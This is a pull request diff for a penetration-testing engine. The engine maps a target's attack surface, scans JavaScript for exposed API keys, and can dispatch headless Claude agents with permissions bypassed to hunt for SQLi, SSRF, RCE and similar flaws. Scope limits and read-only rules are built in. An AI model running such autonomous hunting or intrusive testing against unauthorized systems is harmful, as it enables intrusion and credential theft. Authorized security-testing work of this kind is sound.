### PR TITLE
Engine: map-first deterministic recon + skill-arsenal categorization

### DIFF
--- a/engine/README.md
+++ b/engine/README.md
@@ -1,55 +1,80 @@
-# Engagement engine (v0)
+# Engagement engine
 
-The eval harness proved the gap to "automate 80% of the grind" isn't the *skills*
-(the base model already exploits standard classes) — it's an **autonomous engagement
-system**: scope-safe, stateful, multi-step, false-positive-disciplined. This is that
-system's v0 skeleton.
+A **decision-support engine**, not an autonomous robot. It maps a target's attack surface
+deterministically, **categorizes it against the skill arsenal** (which `hunt-*` skill applies
+where), and **shows you each stage live** — so you spend your expert 20% where the 80%
+automation points. It does **not** try to test everything itself; active hunting is opt-in.
 
-## Design principle
-**Control flow is deterministic code; only hunting/verifying is the LLM.** Scope,
-state, dispatch, ranking, dedup, and reporting are Python — so a long unattended run
-is *safe* (can't go out of scope), *auditable* (everything on disk), and *resumable*.
+## Design principles
+1. **Deterministic-first.** Breadth (recon, parameter discovery, secret scanning, service
+   fingerprint, categorization) is plain Python + passive tooling — **`$0`, no agents, no
+   rate-limit burn**. The LLM is reserved for the few judgment calls in the opt-in hunt.
+2. **Map-first, hunting opt-in.** A default run stops at the **arsenal map** and hands off to
+   you. Spend agents only when you choose (`--hunt`).
+3. **Show every stage.** Each phase logs what it found, live, so you always know where to focus.
+4. **Curl-first.** Active testing uses `curl`; Burp MCP is optional (OOB/blind/fuzzing only).
+5. **Safe by construction.** Scope is a deterministic allowlist; agents run **read-only by
+   default** with hard rules-of-engagement; a deterministic scope-audit flags any out-of-scope PoC.
 
 ```
-scope ─▶ recon ─▶ rank ─▶ hunt ─▶ validate ─▶ report
-  │        │                 │         │
-  │        └ discoveries filtered to in-scope hosts
-  └ deterministic allowlist; no agent is ever dispatched at an out-of-scope target
-                            │         └ adversarial verifier rejects false positives
-                            └ one focused hunt agent per ranked (url, param, class)
+            DEFAULT (deterministic, $0, no agents)        │  OPT-IN  (--hunt)
+ recon ───▶ rank ───▶ map ──────────────────────────────▶│  hunt ─▶ validate ─▶ report
+   │          │         └ surface → skill arsenal +       │   │         └ adversarial verifier (read-only)
+   │          │           curl-first probes (arsenal.md)  │   └ curl-first agent per ranked (url,param,class), skills-off
+   │          └ class-weight priority (secrets boosted)   │
+   └ service/tech + JS endpoints + JS secrets + ALL params (gau + katana), categorized
 ```
+> **OSINT (subdomain/asset enum) is a *separate* concern** — handled by Claude-OSINT, not the
+> engine. The engine takes the in-scope seed target(s) and goes straight to deterministic recon.
 
 | Piece | What it is |
 |---|---|
 | `scope.py` | deterministic allowlist (apex/wildcard/CIDR/regex; deny-wins; default-deny). Enforced at recon **and** hunt. |
-| `state.py` | persistent, resumable engagement store (`state.json` + `evidence/` + `engine.log` + `report.md`). |
-| `agent.py` | headless `claude -p` dispatch (skills + Burp MCP) + JSON extraction. |
-| `engine.py` | the orchestrator: phases, scope enforcement, ranking, candidate→confirm flow, report. |
+| `recon.py` | **deterministic recon** — per target: service/tech (JS markers), JS-bundle endpoint mining, **JS secret scanning** (AWS/GCP/Anthropic/OpenAI/Slack/GitHub/Stripe/EmailJS… keys, redacted), and **all input parameters** from two independent sources — `gau` (passive historical) + `katana` (active live crawl). Noise-filtered, scope-filtered, multi-class categorized. No LLM in the find-step. |
+| `skill_map.py` | **arsenal categorization** — maps each `(endpoint\|param, class)` → the specific `hunt-*` skill(s) **actually installed** in `~/.claude/skills`, plus a curl-first starter probe. Tech-stack skills (`hunt-nextjs`, `hunt-nodejs`…) mapped from the fingerprint. |
+| `osint.py` | **separate/optional** — per-target service/tech probe (PD `httpx-toolkit`) reused by recon. Its subdomain-enum path is *not* in the engine flow (that's Claude-OSINT). |
+| `state.py` | persistent, resumable engagement store (`state.json` + `evidence/` + `engine.log` + `arsenal.md` + `report.md`). |
+| `agent.py` | headless `claude -p` dispatch + JSON extraction. **Skills OFF by default** (eval: ~0 capability gain, saves ~12–15k tokens/agent). Used only for the opt-in hunt/validate. |
+| `engine.py` | the orchestrator: phases, scope enforcement, ranking, the map, parallel hunt/validate, candidate→confirm, report. |
+
+## The map (the default deliverable)
+`map` writes `arsenal.md` and logs every target live — for each endpoint/parameter: the attack
+classes, the exact `hunt-*` skill(s) to open, and a ready-to-run curl. Example line:
+```
+map:   redirect_to   https://t/wp-login.php?redirect_to=FUZZ   ssrf→hunt-ssrf  lfi→hunt-lfi  open-redirect→hunt-open-redirect
+```
 
 ## Run
 ```bash
-cp engine/burp-mcp.json.example engine/burp-mcp.json   # set your mcp-proxy jar path
+# DEFAULT — deterministic map only ($0, no agents). Stops for you with arsenal.md:
+python3 engine/engine.py --scope my-engagement.json
+#   scope file = {name, in_scope, out_of_scope, seeds}; output in ~/.bughunter-engagements/<name>/
 
-# dry-run the whole flow with canned agent output (no agents, no budget) — proves the wiring:
-python3 engine/engine.py --scope engine/engagement.example.json --base /tmp/eng --mock
+# OPT-IN — auto-test the mapped surface with agents (read-only, curl-first, parallel):
+cp engine/burp-mcp.json.example engine/burp-mcp.json   # only if you want Burp for OOB/blind
+python3 engine/engine.py --scope my-engagement.json --hunt --parallel 3 --max-hunts 12
+python3 engine/engine.py --scope my-engagement.json --hunt --allow-intrusive   # permit state-changing PoCs (off by default)
 
-# live (needs Burp running + claude budget); scope file = {name, in_scope, out_of_scope, seeds}:
-python3 engine/engine.py --scope my-engagement.json --max-hunts 8
-python3 engine/engine.py --scope my-engagement.json --phases hunt,validate,report   # resume later phases
+# dry-run the whole wiring with canned output (no agents, no budget):
+python3 engine/engine.py --scope engine/engagement.example.json --base /tmp/eng --mock --hunt
+
+# standalone recon (deterministic, no engine state):
+python3 engine/recon.py https://target/ target.com
 ```
-Engagement state + report land in `~/.bughunter-engagements/<name>/` (outside the repo).
+Key flags: `--hunt` (opt into agents) · `--allow-intrusive` (default OFF = read-only) ·
+`--parallel N` (concurrent agents, default 3) · `--phases a,b,c` (explicit override).
 
-## Honest status (v0)
-- **Deterministic backbone: built, unit-tested, and mock-validated end-to-end** (scope-drop of
-  out-of-scope hosts, rank, candidate→confirm, FP-rejection at validate, report, resume).
-- **Live agent phases: wired but not yet run** — blocked on Burp + claude budget (rate-limited at
-  build time). The same `claude -p` + Burp MCP path is already proven by the eval harness.
-- **v0 limitations (the road ahead):** recon is single-seed and agent-driven (no subdomain enum /
-  multi-host sweep yet); no chaining/escalation between findings; ranking is a static class-weight
-  heuristic; reporting is a deterministic template (not yet the report skills). These are the next
-  increments toward a system that does a real multi-host engagement unattended.
+## Safety
+- **Read-only by default** — hunt/validate agents are told: in-scope hosts only (never
+  third-party, even to prove a finding), and no state-changing actions (no emails/writes/
+  deletes/cache-purge, don't exercise exposed creds). `--allow-intrusive` lifts this.
+- **Deterministic scope-audit** — every confirmed finding is checked for out-of-scope hosts in
+  its PoC; any hit is flagged (⚠) in the report for review.
+- **Calibrated severity** — the adversarial validator's severity (not the hunt's raw guess) is
+  what's stored.
 
 ## Why this and not more skills
-The measured result (`eval/`): skills add ~0 capability on benchmarkable tasks because the model
-already has them. The leverage is here — turning that raw capability into a *safe, stateful,
-self-verifying* engagement loop. This is the part that doesn't exist for free in the base model.
+The measured result (`eval/`): skills add ~0 capability on benchmarkable tasks — the base model
+already exploits standard classes, and skills cost ~12–15k tokens/agent to load. The leverage is
+here: turning that raw capability into a **safe, deterministic, skill-routing, operator-in-the-
+loop** engine. Breadth is free and visible; you bring the judgment.

--- a/engine/agent.py
+++ b/engine/agent.py
@@ -21,7 +21,8 @@ ALLOWED_TOOLS = " ".join([
 ])
 
 
-def run_agent(task, skills_on=True, model="claude-sonnet-4-6", max_turns=40, timeout=600):
+def run_agent(task, skills_on=False, model="claude-sonnet-4-6", max_turns=40, timeout=600):
+    # skills OFF by default: the eval showed they add ~0 capability but cost ~12-15k tokens/agent.
     cmd = ["claude", "-p", task,
            "--mcp-config", MCP_CONFIG, "--strict-mcp-config",
            "--permission-mode", "bypassPermissions",

--- a/engine/engine.py
+++ b/engine/engine.py
@@ -18,6 +18,7 @@ State is persisted after every step, so a run is auditable and resumable.
 import argparse
 import json
 import os
+import re
 import sys
 
 sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
@@ -27,102 +28,248 @@ import agent as A                  # noqa: E402
 
 # deterministic priority by class (impact-ish); used by rank
 CLASS_WEIGHT = {"rce": 100, "sqli": 90, "ssrf": 85, "auth-bypass": 85, "idor": 80,
-                "deserialization": 88, "xxe": 75, "ssti": 88, "lfi": 78, "open-redirect": 40,
-                "xss": 55, "cors": 45, "csrf": 50, "info-leak": 30}
-ALL_PHASES = ["recon", "rank", "hunt", "validate", "report"]
+                "deserialization": 88, "xxe": 75, "ssti": 88, "lfi": 78, "llm-ai": 70,
+                "graphql": 65, "open-redirect": 40, "xss": 55, "cors": 45, "csrf": 50,
+                "info-leak": 30}
+# OSINT (subdomain/asset enum) is a SEPARATE concern (Claude-OSINT) — not in the engine flow.
+# DEFAULT = recon -> rank -> map (deterministic, ~free): map the surface to the skill arsenal and
+# SHOW it. The operator focuses their effort from there. hunt/validate/report are OPT-IN (--hunt).
+ALL_PHASES = ["recon", "rank", "map", "hunt", "validate", "report"]
+DEFAULT_PHASES = ["recon", "rank", "map"]
 
 
 class Engine:
-    def __init__(self, scope_path, base, model, max_hunts, max_turns, timeout, mock=False):
+    def __init__(self, scope_path, base, model, max_hunts, max_turns, timeout, mock=False,
+                 allow_intrusive=False, parallel=3, expand=False):
         self.scope = Scope.load(scope_path)
         self.eng = Engagement(base, self.scope.name)
         self.model, self.max_hunts = model, max_hunts
         self.max_turns, self.timeout, self.mock = max_turns, timeout, mock
+        self.allow_intrusive = allow_intrusive
+        self.expand = expand
+        self.parallel = max(1, parallel)
         self.eng.log(f"engine start | scope={self.scope.name} in={self.scope.in_scope} "
-                     f"out={self.scope.out_of_scope} seeds={self.scope.seeds} mock={mock}")
+                     f"out={self.scope.out_of_scope} seeds={self.scope.seeds} mock={mock} "
+                     f"intrusive={'ALLOWED' if allow_intrusive else 'READ-ONLY (default)'}")
 
-    # ---------------- recon ----------------
+    # ---------------- rules of engagement (injected into every agent) ----------------
+    def _roe(self):
+        hosts = ", ".join(self.scope.in_scope)
+        roe = ("RULES OF ENGAGEMENT (mandatory — authorized SOW):\n"
+               f"- SCOPE: ONLY these hosts are in scope: {hosts}. NEVER send a request to ANY other host "
+               "(no third-party APIs / CDNs / SaaS such as emailjs, salesforce, google, etc.), even to 'prove' a "
+               "finding. If proof would require touching an out-of-scope host/service, DO NOT do it — report the "
+               "finding but set proof_note='would require out-of-scope action (NOT performed)'.\n")
+        if not self.allow_intrusive:
+            roe += ("- READ-ONLY / NON-DESTRUCTIVE: do NOT perform any state-changing or intrusive action — no sending "
+                    "emails, no writes/updates/deletes, no cache purge/revalidate, no account creation, no spam, no "
+                    "flooding/DoS, and do NOT exercise exposed credentials. Demonstrate a finding with the minimum safe, "
+                    "read-only evidence (SHOW that something is exposed; do NOT use it). A finding you cannot demonstrate "
+                    "safely read-only -> report it with proof_note='requires intrusive validation (NOT performed)'.\n")
+        else:
+            roe += "- Intrusive actions are AUTHORIZED for this run; still prefer the least-impactful PoC and log what you did.\n"
+        return roe
+
+    def _scope_audit(self, f):
+        """Deterministic safety net: which out-of-scope hosts did the agent's PoC touch?"""
+        blob = " ".join([str(f.get("request", "")), str(f.get("evidence", "")),
+                         " ".join(f.get("hosts_contacted") or [])])
+        hosts = set(re.findall(r'https?://([A-Za-z0-9.\-]+)', blob)) | set(f.get("hosts_contacted") or [])
+        return sorted({h for h in hosts if h and not self.scope.in_scope_host(h)})
+
+    # ---------------- osint (deterministic scope expansion) ----------------
+    def osint(self):
+        self.eng.set_phase("osint")
+        if self.mock:
+            self.eng.state["targets"] = [{"host": "localhost", "url": s, "status": 200, "tech": []}
+                                         for s in self.scope.seeds]
+            self.eng.save(); self.eng.log(f"osint(mock): {len(self.eng.state['targets'])} target(s)")
+            return
+        import osint as O  # subdomain/asset enum -> live-host + tech map (subfinder/assetfinder/crt.sh + curl)
+        targets = O.osint(self.scope, log=self.eng.log)
+        self.eng.state["targets"] = targets
+        self.eng.save()
+        self.eng.log(f"osint: {len(targets)} live in-scope target(s) -> recon")
+
+    # ---------------- OSINT->recon bridge (opt-in --expand) ----------------
+    def _expand_scope(self):
+        """OPT-IN bridge: enumerate subdomains via the (separate) osint module, probe liveness,
+        and set seeds to every LIVE in-scope host so recon runs on each. Off by default — OSINT is
+        a separate concern (Claude-OSINT); this just ingests its result when you want one tool to do
+        it. The apex alone is usually a marketing page; the real surface is on subdomains."""
+        import osint as O
+        from urllib.parse import urlparse
+        apexes = {".".join((urlparse(s).hostname or "").split(".")[-2:]) for s in self.scope.seeds}
+        subs = set()
+        for apex in sorted(a for a in apexes if a):
+            subs |= O.enumerate_subdomains(apex, log=self.eng.log)
+        in_scope = [s for s in sorted(subs) if self.scope.in_scope_host(s)]
+        self.eng.log(f"expand: {len(subs)} subdomain(s) -> {len(in_scope)} in scope; probing liveness...")
+        live, _ = O.probe_hosts(in_scope, log=self.eng.log)
+        new_seeds = sorted({t["url"] for t in live if t.get("url")})
+        if new_seeds:
+            self.scope.seeds = new_seeds
+            self.eng.log(f"expand: recon will run on {len(new_seeds)} live host(s): "
+                         + ", ".join(urlparse(u).hostname for u in new_seeds[:10]))
+
+    # ---------------- recon (deterministic, SPA-aware, per target) ----------------
     def recon(self):
         self.eng.set_phase("recon")
-        for seed in self.scope.seeds:
-            if not self.scope.in_scope_host(seed):
-                self.eng.log(f"recon: seed {seed} not in scope — skip"); continue
-            self.eng.log(f"recon: enumerating {seed}")
-            items = self._recon_agent(seed)
-            kept, dropped = [], 0
-            for it in items:
-                url = it.get("url", "")
-                if self.scope.in_scope_host(url):
-                    it.setdefault("vuln_class", "info-leak")
-                    kept.append(it)
-                else:
-                    dropped += 1
-            added = self.eng.add_surface(kept)
-            self.eng.log(f"recon: {seed} -> {added} new surface item(s), {dropped} out-of-scope dropped")
-
-    def _recon_agent(self, seed):
         if self.mock:
-            return MOCK_RECON.get(seed, [])
-        task = (f"You are an authorized penetration tester on a sanctioned engagement. "
-                f"Enumerate the attack surface of {seed} (IN SCOPE). Crawl/probe to find endpoints and "
-                f"parameters worth testing. STAY STRICTLY within these in-scope rules: "
-                f"{self.scope.in_scope} (out of scope: {self.scope.out_of_scope}). "
-                f"For each interesting (url, parameter), name the single most likely vulnerability class to test "
-                f"(one of: {', '.join(CLASS_WEIGHT)}). "
-                f"End with a fenced ```json``` array of objects: "
-                f'[{{"url":"<full url>","param":"<param or empty>","vuln_class":"<class>","note":"<why>"}}].')
-        r = A.run_agent(task, model=self.model, max_turns=self.max_turns, timeout=self.timeout)
-        if r.get("error"):
-            self.eng.log(f"recon agent error: {r['error']}"); return []
-        return A.extract_json(r["result"]) or []
+            items = []
+            for seed in self.scope.seeds:
+                items += [it for it in MOCK_RECON.get(seed, []) if self.scope.in_scope_host(it.get("url", ""))]
+            self.eng.add_surface(items)
+            self.eng.log(f"recon(mock): {len(items)} item(s)")
+            return
+        if self.expand:
+            self._expand_scope()
+        import recon as R, osint as O  # deterministic recon: service/tech + endpoints + secrets + params
+        from urllib.parse import urlparse
+        # service / tech fingerprint of the seed target(s) — per-target (NOT subdomain enum)
+        seed_hosts = sorted({urlparse(s).hostname for s in self.scope.seeds if urlparse(s).hostname})
+        tech, _ = O.probe_hosts(seed_hosts, log=self.eng.log)
+        self.eng.state["targets"] = tech
+        self.eng.save()
+        for t in tech:
+            self.eng.log(f"recon: service {t.get('host')} [{t.get('status')}] · {', '.join(t.get('tech', [])) or 'tech?'}")
+        plat = R.platform_recon(self.scope, log=self.eng.log)        # .well-known / Firebase / OAuth / robots
+        api = R.openapi_recon(self.scope, log=self.eng.log)          # OpenAPI schema -> categorized + auth-sweep
+        endpoints, oos = R.spa_recon(self.scope, log=self.eng.log)   # current API endpoints + JS secrets
+        params = R.gather_params(self.scope, log=self.eng.log)       # all input parameters (gau historical)
+        # categorize every (endpoint | param) into its applicable attack classes, expand to work units
+        expanded = list(api) + list(plat)                            # api + platform items are already categorized
+        for it in endpoints:
+            for cls in R.classify_all(it):
+                e = dict(it); e["vuln_class"] = cls; e.pop("vuln_classes", None); expanded.append(e)
+        for it in params:
+            for cls in R.classes_for_param(it.get("param", ""), it.get("url", "")):
+                e = dict(it); e["vuln_class"] = cls; expanded.append(e)
+        added = self.eng.add_surface(expanded)
+        if oos:
+            self.eng.log(f"recon: {len(oos)} out-of-scope host(s) seen, NOT tested: {', '.join(oos[:8])}")
+        self.eng.log(f"recon: {len(api)} api + {len(plat)} platform + {len(endpoints)} endpoint + "
+                     f"{len(params)} param -> {added} categorized (target,class) work unit(s)")
 
     # ---------------- rank ----------------
     def rank(self):
         self.eng.set_phase("rank")
         for s in self.eng.state["surface"]:
             base = CLASS_WEIGHT.get(s.get("vuln_class", ""), 20)
-            s["priority"] = base + (5 if s.get("param") else 0)
+            s["priority"] = base + (5 if s.get("param") else 0) + (55 if s.get("source") == "secret" else 0)
         self.eng.save()
         wl = self.eng.worklist()
         self.eng.log(f"rank: {len(wl)} item(s) prioritized; top: "
                      + ", ".join(f"{s['vuln_class']}@{s['url']}" for s in wl[:3]))
 
+    # ---------------- map (arsenal categorization — the default deliverable) ----------------
+    def map(self):
+        """Categorize the surface against the skill arsenal and SHOW it: per target ->
+        applicable hunt-* skill(s) + first curl. This is where the operator focuses; the
+        engine does NOT auto-test by default (run with --hunt to spend agents)."""
+        self.eng.set_phase("map")
+        import skill_map as SM
+        from collections import OrderedDict
+        tech = sorted({t for tg in self.eng.state.get("targets", []) for t in tg.get("tech", [])})
+        groups = OrderedDict()
+        for s in sorted(self.eng.state["surface"], key=lambda z: -z.get("priority", 0)):
+            key = (s["url"], s.get("param", ""))
+            g = groups.setdefault(key, {"classes": [], "src": s.get("source", "")})
+            if s["vuln_class"] not in g["classes"]:
+                g["classes"].append(s["vuln_class"])
+        tech_sk = SM.tech_skills(tech)
+        lines = [f"# Arsenal map — {self.scope.name}", "",
+                 f"**Service / tech:** {', '.join(tech) or '?'}  ",
+                 f"**Tech-wide skills:** {', '.join('`'+s+'`' for s in tech_sk) or 'none'}  ",
+                 f"**Attack surface:** {len(groups)} target(s). For each: applicable skill(s) + the first curl.",
+                 "", "> Active testing is curl-first; Burp MCP only for OOB/blind/fuzzing. "
+                 "Run the engine with `--hunt` to auto-test these with agents (skills-off, parallel).", ""]
+        self.eng.log(f"map: ARSENAL — tech-skills: {', '.join(tech_sk) or 'none'} | {len(groups)} target(s):")
+        for (url, param), g in groups.items():
+            label = param if param else "(endpoint)"
+            per = "  ".join(f"{c}→{','.join(SM.skills_for(c))}" for c in g["classes"])
+            self.eng.log(f"map:   {label:16.16s} {url[:42]:42.42s}  {per}")
+            lines.append(f"## `{label}`  —  {', '.join(g['classes'])}")
+            lines.append(f"- **URL:** `{url}`" + (f"  ·  source: {g['src']}" if g["src"] else ""))
+            for c in g["classes"]:
+                lines.append(f"- **{c}** → {', '.join('`'+s+'`' for s in SM.skills_for(c))}  ·  "
+                             f"`{SM.probe_for(c, url, param)}`")
+            lines.append("")
+        path = os.path.join(self.eng.dir, "arsenal.md")
+        open(path, "w").write("\n".join(lines))
+        self.eng.log(f"map: wrote arsenal map -> {path}  ← focus your 20% here (or run --hunt to auto-test)")
+
+    # ---------------- parallel runner ----------------
+    def _run_parallel(self, fn, items):
+        """Run fn(item) across self.parallel workers; yield (item, result) as each finishes.
+        Workers do only the slow agent call (NO state mutation); the caller serializes all
+        state writes, so there's no race on state.json."""
+        if self.parallel <= 1 or len(items) <= 1:
+            for it in items:
+                yield it, fn(it)
+            return
+        from concurrent.futures import ThreadPoolExecutor, as_completed
+        with ThreadPoolExecutor(max_workers=self.parallel) as ex:
+            futs = {ex.submit(fn, it): it for it in items}
+            for fut in as_completed(futs):
+                it = futs[fut]
+                try:
+                    yield it, fut.result()
+                except Exception as e:
+                    self.eng.log(f"  worker error on {it.get('url')}: {e}")
+                    yield it, {}
+
     # ---------------- hunt ----------------
     def hunt(self):
         self.eng.set_phase("hunt")
         wl = self.eng.worklist()[: self.max_hunts]
-        self.eng.log(f"hunt: testing {len(wl)} item(s) (cap {self.max_hunts})")
+        todo = []
         for it in wl:
-            url = it["url"]
-            if not self.scope.in_scope_host(url):     # belt-and-suspenders scope gate
-                self.eng.log(f"hunt: REFUSING out-of-scope {url} ({self.scope.reject_reason(url)})")
-                self.eng.mark_tested(it); continue
-            f = self._hunt_agent(it)
-            self.eng.mark_tested(it)
-            if f and f.get("vulnerable"):
-                cand = {"url": url, "param": it.get("param", ""), "vuln_class": it.get("vuln_class"),
-                        "severity": f.get("severity", "unknown"), "evidence": f.get("evidence", ""),
-                        "request": f.get("request", "")}
-                self.eng.add_candidate(cand)
-                self.eng.log(f"hunt: CANDIDATE {cand['vuln_class']} @ {url}")
+            if not self.scope.in_scope_host(it["url"]):     # belt-and-suspenders scope gate
+                self.eng.log(f"hunt: REFUSING out-of-scope {it['url']} ({self.scope.reject_reason(it['url'])})")
+                self.eng.mark_tested(it)
             else:
-                self.eng.log(f"hunt: nothing on {it.get('vuln_class')}@{url}")
+                todo.append(it)
+        self.eng.log(f"hunt: testing {len(todo)} item(s), {self.parallel} at a time")
+        for it, f in self._run_parallel(self._hunt_agent, todo):
+            self.eng.mark_tested(it)
+            if f and f.get("rate_limited"):
+                self.eng.log("hunt: ⚠ claude usage limit hit — remaining results may be partial")
+            if f and f.get("vulnerable"):
+                oos = self._scope_audit(f)
+                cand = {"url": it["url"], "param": it.get("param", ""), "vuln_class": it.get("vuln_class"),
+                        "severity": f.get("severity", "unknown"), "evidence": f.get("evidence", ""),
+                        "request": f.get("request", ""), "proof_note": f.get("proof_note", ""),
+                        "scope_warning": oos or None}
+                self.eng.add_candidate(cand)
+                self.eng.log((f"hunt: ⚠ CANDIDATE {cand['vuln_class']} @ {it['url']} — PoC touched OUT-OF-SCOPE "
+                              f"host(s): {', '.join(oos)} (flagged)") if oos
+                             else f"hunt: CANDIDATE {cand['vuln_class']} @ {it['url']}")
+            else:
+                self.eng.log(f"hunt: nothing on {it.get('vuln_class')}@{it['url']}")
 
     def _hunt_agent(self, it):
         if self.mock:
             return MOCK_HUNT.get((it["url"], it.get("vuln_class")), {"vulnerable": False})
-        task = (f"You are an authorized penetration tester on a sanctioned engagement (IN SCOPE). "
-                f"Test {it['url']} (parameter `{it.get('param','')}`) for {it.get('vuln_class')}. "
-                f"Use the Burp MCP tools or curl. Only claim a vulnerability if you can DEMONSTRATE real, "
-                f"exploitable impact — not mere reflection, an error, or a permissive header. "
+        import skill_map as SM
+        tech = sorted({t for tg in self.eng.state.get("targets", []) for t in tg.get("tech", [])})
+        skills = SM.skills_for(it.get("vuln_class", "")) + SM.tech_skills(tech)
+        probe = SM.probe_for(it.get("vuln_class", ""), it["url"], it.get("param"))
+        task = (self._roe() + "\n"
+                f"TASK: Test {it['url']} (parameter `{it.get('param','')}`) for {it.get('vuln_class')}, strictly "
+                f"within the rules of engagement above. Apply the methodology of: {', '.join(skills)}. "
+                f"curl-FIRST: use curl for your requests; use the Burp MCP tools ONLY if you genuinely need "
+                f"OOB/blind/fuzzing (e.g. Collaborator for blind SSRF/XXE). Starter probe: {probe} . "
+                f"Only claim a vulnerability if you can DEMONSTRATE real, exploitable impact (not mere reflection, "
+                f"an error, or a permissive header) using ONLY in-scope, read-only actions. "
                 f"End with a fenced ```json``` object: "
-                f'{{"vulnerable":true|false,"severity":"low|medium|high|critical","evidence":"<what proves it>","request":"<the winning request>"}}.')
+                f'{{"vulnerable":true|false,"severity":"low|medium|high|critical","evidence":"<what proves it>",'
+                f'"request":"<the winning request>","hosts_contacted":["every host you sent a request to"],'
+                f'"proof_note":"<empty, or why proof was limited by scope/read-only>"}}.')
         r = A.run_agent(task, model=self.model, max_turns=self.max_turns, timeout=self.timeout)
         if r.get("error"):
             self.eng.log(f"hunt agent error ({it['url']}): {r['error']}")
-            if r["error"] == "rate-limited":
-                raise SystemExit("stopped: claude usage limit reached")
-            return {"vulnerable": False}
+            return {"vulnerable": False, "rate_limited": r["error"] == "rate-limited"}
         return A.extract_json(r["result"]) or {"vulnerable": False}
 
     # ---------------- validate ----------------
@@ -131,24 +278,30 @@ class Engine:
         pending = [c for c in self.eng.state["candidates"]
                    if not any(cf.get("url") == c["url"] and cf.get("vuln_class") == c["vuln_class"]
                               for cf in self.eng.state["confirmed"])]
-        self.eng.log(f"validate: {len(pending)} candidate(s) to adversarially verify")
-        for c in pending:
-            v = self._validate_agent(c)
-            if v.get("real"):
+        self.eng.log(f"validate: {len(pending)} candidate(s) to adversarially verify, {self.parallel} at a time")
+        for c, v in self._run_parallel(self._validate_agent, pending):
+            if v and v.get("real"):
+                if v.get("severity"):
+                    c["severity"] = v["severity"]  # use the validator's CALIBRATED severity, not the hunt's
                 self.eng.confirm(c, v)
-                self.eng.log(f"validate: CONFIRMED {c['vuln_class']} @ {c['url']} ({v.get('severity','')})")
+                self.eng.log(f"validate: CONFIRMED {c['vuln_class']} @ {c['url']} ({v.get('severity','')})"
+                             + (f" ⚠ scope-flagged: {', '.join(c['scope_warning'])}" if c.get('scope_warning') else ''))
             else:
-                self.eng.log(f"validate: rejected (false positive) {c['vuln_class']} @ {c['url']} — {v.get('reason','')}")
+                self.eng.log(f"validate: rejected (false positive) {c['vuln_class']} @ {c['url']} — "
+                             f"{(v or {}).get('reason', 'no verdict')}")
 
     def _validate_agent(self, c):
         if self.mock:
             return MOCK_VALIDATE.get((c["url"], c["vuln_class"]), {"real": False, "reason": "mock-default"})
-        task = (f"Adversarially verify a claimed finding (be skeptical — default to false positive if unproven). "
+        task = (self._roe() + "\n"
+                f"Adversarially verify a claimed finding (be skeptical — default to false positive if unproven). "
                 f"Claim: {c['vuln_class']} at {c['url']} (param `{c.get('param','')}`). "
                 f"Reported evidence: {c.get('evidence','')[:400]}. "
-                f"Independently re-test it (Burp MCP / curl). Is it a REAL, exploitable vulnerability or a false positive? "
+                f"Independently re-test it WITHIN the rules of engagement above (in-scope + read-only only). If the only "
+                f"proof would require an out-of-scope host or an intrusive action, treat the impact as UNPROVEN and lower "
+                f"the severity. Is it a REAL, exploitable vulnerability or a false positive? "
                 f"End with a fenced ```json``` object: "
-                f'{{"real":true|false,"severity":"low|medium|high|critical","reason":"<why>"}}.')
+                f'{{"real":true|false,"severity":"low|medium|high|critical","reason":"<why, incl. any scope/intrusive caveat>"}}.')
         r = A.run_agent(task, model=self.model, max_turns=self.max_turns, timeout=self.timeout)
         if r.get("error"):
             self.eng.log(f"validate agent error: {r['error']}")
@@ -166,12 +319,22 @@ class Engine:
                  f"candidates: {s['candidates']} · **confirmed: {s['confirmed']}**", ""]
         if not c:
             lines += ["No confirmed findings.", ""]
+        flagged = [f for f in c if f.get("scope_warning")]
+        if flagged:
+            lines += [f"> ⚠️ **{len(flagged)} finding(s) flagged: PoC referenced an out-of-scope host — "
+                      f"review before reporting to the client.**", ""]
         for i, f in enumerate(c, 1):
-            lines += [f"## {i}. {f.get('vuln_class','?').upper()} — {f.get('severity','?')}",
-                      f"- **URL:** `{f['url']}`" + (f" (param `{f['param']}`)" if f.get("param") else ""),
-                      f"- **Evidence:** {f.get('evidence','')}",
+            block = [f"## {i}. {f.get('vuln_class','?').upper()} — {f.get('severity','?')}",
+                     f"- **URL:** `{f['url']}`" + (f" (param `{f['param']}`)" if f.get("param") else "")]
+            if f.get("scope_warning"):
+                block.append(f"- ⚠️ **SCOPE WARNING:** PoC referenced out-of-scope host(s): "
+                             f"`{'`, `'.join(f['scope_warning'])}` — verify the in-scope finding holds without them.")
+            if f.get("proof_note"):
+                block.append(f"- **Proof note:** {f['proof_note']}")
+            block += [f"- **Evidence:** {f.get('evidence','')}",
                       f"- **Request:** `{f.get('request','')}`",
                       f"- **Verifier:** {f.get('verdict',{}).get('reason','')}", ""]
+            lines += block
         path = os.path.join(self.eng.dir, "report.md")
         open(path, "w").write("\n".join(lines))
         self.eng.log(f"report: wrote {len(c)} confirmed finding(s) -> {path}")
@@ -209,15 +372,31 @@ def main():
     ap = argparse.ArgumentParser()
     ap.add_argument("--scope", required=True, help="engagement/scope JSON (name, in_scope, out_of_scope, seeds)")
     ap.add_argument("--base", default="~/.bughunter-engagements")
-    ap.add_argument("--phases", default=",".join(ALL_PHASES))
+    ap.add_argument("--phases", default=None,
+                    help="explicit phase list; default is recon,rank,map (add --hunt to test)")
+    ap.add_argument("--hunt", action="store_true",
+                    help="OPT-IN: after mapping, auto-test with agents (recon,rank,map,hunt,validate,report)")
     ap.add_argument("--model", default="claude-sonnet-4-6")
     ap.add_argument("--max-hunts", type=int, default=10)
     ap.add_argument("--max-turns", type=int, default=40)
     ap.add_argument("--timeout", type=int, default=600)
     ap.add_argument("--mock", action="store_true", help="dry-run the orchestration with canned agent output")
+    ap.add_argument("--allow-intrusive", action="store_true",
+                    help="permit state-changing PoCs (emails/writes/purges). DEFAULT OFF = read-only, non-destructive.")
+    ap.add_argument("--parallel", type=int, default=3, help="concurrent hunt/validate agents (default 3)")
+    ap.add_argument("--expand", action="store_true",
+                    help="OSINT bridge: enumerate subdomains, probe, and recon every live in-scope host "
+                         "(the apex is usually just marketing; the real surface is on subdomains)")
     a = ap.parse_args()
-    eng = Engine(a.scope, a.base, a.model, a.max_hunts, a.max_turns, a.timeout, a.mock)
-    eng.run([p.strip() for p in a.phases.split(",") if p.strip()])
+    if a.phases:
+        phases = [p.strip() for p in a.phases.split(",") if p.strip()]
+    elif a.hunt:
+        phases = ALL_PHASES                       # full: map then auto-test
+    else:
+        phases = DEFAULT_PHASES                   # default: recon -> rank -> map, then STOP for the operator
+    eng = Engine(a.scope, a.base, a.model, a.max_hunts, a.max_turns, a.timeout, a.mock,
